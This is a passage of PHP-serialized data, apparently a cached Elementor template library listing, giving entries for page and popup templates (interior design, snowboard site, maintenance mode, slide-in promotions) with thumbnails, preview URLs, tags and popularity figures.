Promotion\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2019/01/slidein_promotion_av_small.png\";s:12:\"tmpl_created\";i:1547844661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/slide-in-promotion-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:695;s:11:\"trend_index\";i:691;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:614;a:14:{s:2:\"id\";i:9373;s:5:\"title\";s:33:\"Landing Page &#8211; Conference 5\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/11/conference-250.png\";s:12:\"tmpl_created\";i:1542811219;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:99;s:16:\"popularity_index\";i:256;s:11:\"trend_index\";i:378;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:615;a:14:{s:2:\"id\";i:974;s:5:\"title\";s:28:\"Landing Page &#8211; Stylist\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/03/Landing-Page-Stylist.png\";s:12:\"tmpl_created\";i:1494352071;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-stylist/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:146:\"[\"cosmetics\",\"fashion\",\"girly\",\"hairdresser\",\"lifestyle\",\"makeup\",\"manicure\",\"pedicure\",\"products\",\"salon\",\"Shop\",\"skincare\",\"stylist\",\"wellness\"]\";s:10:\"menu_order\";i:100;s:16:\"popularity_index\";i:302;s:11:\"trend_index\";i:382;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:616;a:14:{s:2:\"id\";i:11948;s:5:\"title\";s:18:\"Maintenance Mode 3\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/10/mm3.png\";s:12:\"tmpl_created\";i:1572153978;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";i:101;s:16:\"popularity_index\";i:206;s:11:\"trend_index\";i:79;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:617;a:14:{s:2:\"id\";i:754;s:5:\"title\";s:25:\"Services &#8211; Interior\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/01/Interior-Services.png\";s:12:\"tmpl_created\";i:1485269691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/services-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:102;s:16:\"popularity_index\";i:239;s:11:\"trend_index\";i:285;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:618;a:14:{s:2:\"id\";i:752;s:5:\"title\";s:24:\"Contact &#8211; Interior\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/01/interior-contact.png\";s:12:\"tmpl_created\";i:1485269737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/contact-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:103;s:16:\"popularity_index\";i:307;s:11:\"trend_index\";i:557;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:619;a:14:{s:2:\"id\";i:753;s:5:\"title\";s:22:\"About &#8211; Interior\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/01/Interior-About.png\";s:12:\"tmpl_created\";i:1485269710;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/about-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:104;s:16:\"popularity_index\";i:291;s:11:\"trend_index\";i:441;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:620;a:14:{s:2:\"id\";i:751;s:5:\"title\";s:25:\"Homepage &#8211; Interior\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/01/interior-home.png\";s:12:\"tmpl_created\";i:1485269743;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:248;s:11:\"trend_index\";i:372;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:621;a:14:{s:2:\"id\";i:9559;s:5:\"title\";s:16:\"Slide In | Login\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2019/01/slidein_login_01_small.png\";s:12:\"tmpl_created\";i:1546946547;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/popups/slide-in-login-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:554;s:11:\"trend_index\";i:636;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:622;a:14:{s:2:\"id\";i:2402;s:5:\"title\";s:32:\"Homepage &#8211; Interior Design\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2017/09/Interior.png\";s:12:\"tmpl_created\";i:1506441447;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:193:\"[\"Architecture\",\"building\",\"business\",\"Creative\",\"exterior design\",\"furniture design\",\"Gallery\",\"garden design\",\"house\",\"interior design\",\"landscape design\",\"multipurpose\",\"portfolio\",\"studio\"]\";s:10:\"menu_order\";i:106;s:16:\"popularity_index\";i:105;s:11:\"trend_index\";i:275;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:623;a:14:{s:2:\"id\";i:3626;s:5:\"title\";s:30:\"Snowboard Site &#8211; Contact\";s:9:\"thumbnail\";s:62:\"https://library.elementor.com/wp-content/uploads/2017/12/3.png\";s:12:\"tmpl_created\";i:1513513193;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/snowboard-site-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:260;s:11:\"trend_index\";i:353;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:624;a:14:{s:2:\"id\";i:9752;s:5:\"title\";s:27:\"Slide In | Sale | Promotion\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/rush_small.png\";s:12:\"tmpl_created\";i:1547823982;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/popups/slide-in-sale-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:680;s:11:\"trend_index\";i:655;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:625;a:14:{s:2:\"id\";i:11966;s:5:\"title\";s:18:\"Maintenance mode 4\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/10/mm4.png\";s:12:\"tmpl_created\";i:1572154274;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";i:108;s:16:\"popularity_index\";i:502;s:11:\"trend_index\";i:413;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:626;a:14:{s:2:\"id\";i:3632;s:5:\"title\";s:31:\"Snowboard Site &#8211; Services\";s:9:\"thumbnail\";s:62:\"https://library.elementor.com/wp-content/uploads/2017/12/2.png\";s:12:\"tmpl_created\";i:1513513171;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/snowboard-site-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:109;s:16:\"popularity_index\";i:201;s:11:\"trend_index\";i:362;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:627;a:14:{s:2:\"id\";i:3619;s:5:\"title\";s:31:\"Snowboard Site &#8211; Homepage\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2017/12/home.png\";s:12:\"tmpl_created\";i:1513513137;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/snowboard-site-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:110;s:16:\"popularity_index\";i:217;s:11:\"trend_index\";i:438;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:628;a:14:{s:2:\"id\";i:9425;s:5:\"title\";s:38:\"Black Friday &#8211;  80&#8217;s style\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/11/unnamed-file.png\";s:12:\"tmpl_created\";i:1542901234;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/black-friday-80s-style/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:111;s:16:\"popularity_index\";i:338;s:11:\"trend_index\";i:332;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:629;a:14:{s:2:\"id\";i:10169;s:5:\"title\";s:37:\"Slide In | Register | Subscribe | App\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/01/slideinapp_small.png\";s:12:\"tmpl_created\";i:1547852334;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/popups/slide-in-register-subscribe-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:461;s:11:\"trend_index\";i:656;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:630;a:14:{s:2:\"id\";i:11973;s:5:\"title\";s:18:\"Maintenance mode 5\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/10/mm5.png\";s:12:\"tmpl_created\";i:1572154523;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:447;s:11:\"trend_index\";i:289;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:631;a:14:{s:2:\"id\";i:11981;s:5:\"title\";s:18:\"Maintenance mode 6\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/10/mm6.png\";s:12:\"tmpl_created\";i:1572155125;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";i:113;s:16:\"popularity_index\";i:444;s:11:\"trend_index\";i:260;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:632;a:14:{s:2:\"id\";i:147;s:5:\"title\";s:20:\"Homepage &#8211; App\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0004.png\";s:12:\"tmpl_created\";i:1470829868;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/homepage-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"App\",\"Homepage\"]\";s:10:\"menu_order\";i:115;s:16:\"popularity_index\";i:4;s:11:\"trend_index\";i:21;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:633;a:14:{s:2:\"id\";i:9680;s:5:\"title\";s:23:\"Slide In | Content Lock\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2019/01/Slide-in_Content-lock_small_01.png\";s:12:\"tmpl_created\";i:1547010967;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/popups/slide-in-content-lock-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:115;s:16:\"popularity_index\";i:671;s:11:\"trend_index\";i:668;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:634;a:14:{s:2:\"id\";i:777;s:5:\"title\";s:28:\"Homepage &#8211; Coffee Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/01/rest-home.jpg\";s:12:\"tmpl_created\";i:1485273092;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/homepage-coffee-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:41:\"[\"Coffee\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";i:116;s:16:\"popularity_index\";i:156;s:11:\"trend_index\";i:276;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:635;a:14:{s:2:\"id\";i:2404;s:5:\"title\";s:24:\"Homepage &#8211; Product\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/09/product.png\";s:12:\"tmpl_created\";i:1506441452;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-product/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:103:\"[\"business\",\"colorful\",\"ecommerce\",\"flat\",\"mobile\",\"modern\",\"responsive\",\"retina\",\"Shop\",\"woocommerce\"]\";s:10:\"menu_order\";i:117;s:16:\"popularity_index\";i:149;s:11:\"trend_index\";i:325;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:636;a:14:{s:2:\"id\";i:9783;s:5:\"title\";s:31:\"Slide In | Register | Subscribe\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2019/01/slidein_yellow_small.png\";s:12:\"tmpl_created\";i:1547831059;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/popups/slide-in-register-subscribe/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:117;s:16:\"popularity_index\";i:500;s:11:\"trend_index\";i:579;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:637;a:14:{s:2:\"id\";i:492;s:5:\"title\";s:25:\"Homepage &#8211; Law firm\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0024.png\";s:12:\"tmpl_created\";i:1477388365;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-law-firm/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"Firm\",\"Homepage\",\"Law\"]\";s:10:\"menu_order\";i:118;s:16:\"popularity_index\";i:13;s:11:\"trend_index\";i:58;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:638;a:14:{s:2:\"id\";i:3451;s:5:\"title\";s:39:\"Homepage &#8211; Goodness meal services\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/11/goodness-featured-image.png\";s:12:\"tmpl_created\";i:1512054116;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/homepage-goodness-meal-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:119;s:16:\"popularity_index\";i:236;s:11:\"trend_index\";i:357;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:639;a:14:{s:2:\"id\";i:2152;s:5:\"title\";s:26:\"Homepage &#8211; Cake Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-home.png\";s:12:\"tmpl_created\";i:1499774132;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/homepage-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Cake\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";i:120;s:16:\"popularity_index\";i:348;s:11:\"trend_index\";i:477;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:640;a:14:{s:2:\"id\";i:1068;s:5:\"title\";s:27:\"Homepage &#8211; Copywriter\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/copywriter.png\";s:12:\"tmpl_created\";i:1488805928;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-copywriter/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"Copywriter\",\"Homepage\"]\";s:10:\"menu_order\";i:121;s:16:\"popularity_index\";i:221;s:11:\"trend_index\";i:415;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:641;a:14:{s:2:\"id\";i:2813;s:5:\"title\";s:32:\"Homepage &#8211; Creative Agency\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2017/11/Creative-Agency-–-Home-Page.png\";s:12:\"tmpl_created\";i:1509615049;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-creative-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Agency\",\"Creative\",\"Homepage\"]\";s:10:\"menu_order\";i:122;s:16:\"popularity_index\";i:117;s:11:\"trend_index\";i:217;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:642;a:14:{s:2:\"id\";i:728;s:5:\"title\";s:33:\"Homepage &#8211; Delivery Company\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/01/delivery-company-home-page.jpg\";s:12:\"tmpl_created\";i:1485269993;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/homepage-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Delivery\",\"Homepage\"]\";s:10:\"menu_order\";i:123;s:16:\"popularity_index\";i:288;s:11:\"trend_index\";i:529;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:643;a:14:{s:2:\"id\";i:2403;s:5:\"title\";s:29:\"Homepage &#8211; Luxury Hotel\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/09/Hotel.png\";s:12:\"tmpl_created\";i:1506441428;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/homepage-luxury-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:124;s:16:\"popularity_index\";i:277;s:11:\"trend_index\";i:339;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:644;a:14:{s:2:\"id\";i:1903;s:5:\"title\";s:20:\"One Page &#8211; Spa\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2017/06/spa.png\";s:12:\"tmpl_created\";i:1496822325;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/one-page-spa/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:132:\"[\"beauty\",\"care\",\"girly\",\"hair\",\"Health\",\"hospitality\",\"massage\",\"medical\",\"parlor\",\"physiotherapy\",\"salon\",\"spa\",\"wellness\",\"yoga\"]\";s:10:\"menu_order\";i:125;s:16:\"popularity_index\";i:187;s:11:\"trend_index\";i:227;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:645;a:14:{s:2:\"id\";i:2123;s:5:\"title\";s:33:\"One Page &#8211; Architect Office\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/06/architect.png\";s:12:\"tmpl_created\";i:1499772989;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/one-page-architect-office/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:126;s:16:\"popularity_index\";i:11;s:11:\"trend_index\";i:20;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:646;a:14:{s:2:\"id\";i:1888;s:5:\"title\";s:32:\"One Page &#8211; Creative Meetup\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2017/06/creative-meetup.png\";s:12:\"tmpl_created\";i:1496822319;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/one-page-creative-meetup/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:127;s:16:\"popularity_index\";i:284;s:11:\"trend_index\";i:502;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:647;a:14:{s:2:\"id\";i:1891;s:5:\"title\";s:35:\"One Page &#8211; Textile Convention\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/06/textile-meetup.png\";s:12:\"tmpl_created\";i:1496822323;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/one-page-textile-convention/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:128;s:16:\"popularity_index\";i:427;s:11:\"trend_index\";i:594;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:648;a:14:{s:2:\"id\";i:1880;s:5:\"title\";s:24:\"One Page &#8211; Wedding\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/06/wedding.png\";s:12:\"tmpl_created\";i:1496822317;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/one-page-wedding/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:82:\"[\"bride\",\"ceremony\",\"cute\",\"event\",\"fancy\",\"girly\",\"groom\",\"guestbook\",\"marriage\"]\";s:10:\"menu_order\";i:129;s:16:\"popularity_index\";i:468;s:11:\"trend_index\";i:614;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:649;a:14:{s:2:\"id\";i:1885;s:5:\"title\";s:29:\"One Page &#8211; Yacht Rental\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/06/yacht-home.png\";s:12:\"tmpl_created\";i:1496822321;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/one-page-yacht-rental/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:130;s:16:\"popularity_index\";i:210;s:11:\"trend_index\";i:409;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:650;a:14:{s:2:\"id\";i:2723;s:5:\"title\";s:34:\"Portfolio &#8211; Graphic Designer\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2017/11/Graphic-Designer-–-Portfolio.png\";s:12:\"tmpl_created\";i:1509633883;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/portfolio-graphic-designer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:131;s:16:\"popularity_index\";i:190;s:11:\"trend_index\";i:282;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:651;a:14:{s:2:\"id\";i:2145;s:5:\"title\";s:30:\"About &#8211; Delivery Company\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-about.png\";s:12:\"tmpl_created\";i:1499774125;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/about-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:10:\"[\"moving\"]\";s:10:\"menu_order\";i:132;s:16:\"popularity_index\";i:355;s:11:\"trend_index\";i:630;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:652;a:14:{s:2:\"id\";i:2155;s:5:\"title\";s:23:\"About &#8211; Cake 